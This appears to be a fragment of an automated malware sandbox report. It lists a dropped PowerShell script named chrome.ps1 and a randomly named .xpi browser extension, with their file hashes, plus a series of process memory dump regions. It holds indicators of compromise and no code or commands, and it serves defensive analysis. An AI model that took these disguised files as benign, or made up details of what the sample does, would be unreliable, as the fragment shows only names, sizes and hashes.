                        e59257cb842203b9447589c1ae1d61992bfabdbb3e2ea53ab73e08e0f99d57e19af066737b9177b454f71ae1d1535394a5e801b20ae49514a33a6cd802075f70

                        Download Submit

                      • C:\Users\Public\Documents\chrome.ps1
                        Filesize

                        9KB

                        MD5

                        8f539c72c647fddb46ae09ad7fe3edc7

                        SHA1

                        f9fded26e9b6c1fc4292e2a29dddbf5d7491383c

                        SHA256

                        48d3b281e2b4b42dd42e6a409334a350691edcbe6a4e85f25a87db5eacbb1557

                        SHA512

                        ff82ec53cc548bb13f57c531e00fc1ee5222da43c4f432239534429b5bfd253b60999c43bb76fc5a7e574bca3f4295edff5f44c97e1cce1f0f7a8e38133f731e

                        Download Submit

                      • C:\Users\Public\Downloads\bloydw29z3fqau5k.xpi
                        Filesize

                        22KB

                        MD5

                        9ad9bcf95133dc5452f6be958c20134b

                        SHA1

                        35635061007a2575c7b09b6fa5a981acdc9ac193

                        SHA256

                        ff3d5e54e656e1ba9aa5ac65e85736b7acb72a91c3aa78f23aaa2f10616ca66f

                        SHA512

                        c91a7222c3e39037335dbdbd0bd97e6a9f5beb031a2a230b9dec7dc378e668c58aa6251988575ee1391c4a450a11aa263ea32574ffbb9069a4eedfa38331a894

                        Download Submit

                      • memory/4016-32-0x00007FFFFB730000-0x00007FFFFC1F1000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4016-22-0x00007FFFFB730000-0x00007FFFFC1F1000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4016-21-0x00007FFFFB730000-0x00007FFFFC1F1000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4016-36-0x00007FFFFB730000-0x00007FFFFC1F1000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4472-0-0x00007FFFFBC03000-0x00007FFFFBC05000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/4472-18-0x00007FFFFBC00000-0x00007FFFFC6C1000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4472-1-0x000002AC620A0000-0x000002AC620C2000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/4472-12-0x00007FFFFBC00000-0x00007FFFFC6C1000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4472-7-0x00007FFFFBC00000-0x00007FFFFC6C1000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/5000-61-0x00000236F23F0000-0x00000236F25B2000-memory.dmp

                        Filesize

                        1.8MB

                        Download

                      • memory/5000-63-0x00000236F22A0000-0x00000236F22B2000-memory.dmp

                        Filesize

                        72KB

                        Download

                      • memory/5000-64-0x00000236F2280000-0x00000236F228A000-memory.dmp

                        Filesize

                        40KB

                        Download